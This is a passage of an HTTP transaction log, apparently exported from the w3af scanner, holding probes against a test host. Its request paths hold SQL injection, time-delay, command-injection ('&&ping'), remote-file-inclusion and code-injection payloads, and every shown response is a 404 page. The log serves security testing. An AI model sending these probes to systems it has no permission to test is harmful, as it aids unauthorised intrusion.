                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="494">
                <http-request>
                    <status>GET http://10.12.68.43:31337/85+AND+85%3D86+ HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="518">
                <http-request>
                    <status>GET http://10.12.68.43:31337/ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="527">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="550" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="528">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtP%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="529">
                <http-request>
                    <status>GET http://10.12.68.43:31337/w3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="552" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/w3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="530">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A%2F%2Fw3af.org%2Frfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="565" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A%2F%2Fw3af.org%2Frfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="533">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Thread.sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="535">
                <http-request>
                    <status>GET http://10.12.68.43:31337/hTtP%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/hTtP%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="537">
                <http-request>
                    <status>GET http://10.12.68.43:31337/http%3A/w3af.org/rfi.html HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/http%3A//w3af.org/rfi.html&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="584">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="602">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%2Fusr%2Fsbin%2Fping+-s+localhost+4 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="618">
                <http-request>
                    <status>GET http://10.12.68.43:31337/Thread.Sleep%283000%29%3B HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="558" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/Thread.Sleep%283000%29%3B&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="664">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="701">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-n+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="760">
                <http-request>
                    <status>POST http://10.12.68.43:31337/31%22+OR+%2231%22%3D%2231 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="762">
                <http-request>
                    <status>GET http://10.12.68.43:31337/1%29%29%3Bwaitfor+delay+%270%3A0%3A3%27-- HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="763">
                <http-request>
                    <status>POST http://10.12.68.43:31337/sZAKmkrd HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="775">
                <http-request>
                    <status>POST http://10.12.68.43:31337/31%22+AND+%2231%22%3D%2232 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="794">
                <http-request>
                    <status>GET http://10.12.68.43:31337/%26%26ping+-c+4+localhost HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.43:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Page Not Found&lt;/title&gt;&lt;style&gt;body{margin:0;padding:30px;font:12px/1.5 Helvetica,Arial,Verdana,sans-serif;}h1{margin:0;font-size:48px;font-weight:normal;line-height:48px;}strong{display:inline-block;width:65px;}&lt;/style&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;404 Page Not Found&lt;/h1&gt;&lt;p&gt;The page you are looking for could not be found. Check the address bar to ensure your URL is spelled correctly. If all else fails, you can visit our home page at the link below.&lt;/p&gt;&lt;a href=&quot;/&quot;&gt;Visit the Home Page&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </http-response>
            </http-transaction>
            <http-transaction id="802">
                <http-request>
                    <status>POST http://10.12.68.43:31337/31%27+OR+%2731%27%3D%2731 HTTP/1.1</status>
                    <headers>
                        <header content="31" field="Content-length"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                        <header content="10.12.68.43:31337" field="Host"/>
                        <header content="http://10.12.68.43:31337/" field="Referer"/>
                        <header content="application/x-www-form-urlencoded" field="Content-type"/>
                    </headers>
                    <body content-encoding="base64">bWVzc2FnZT1IZWxsbyUyMFdvcmxkJnBzZXVkbz01Ng==
</body>
                </http-request>
                <http-response>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
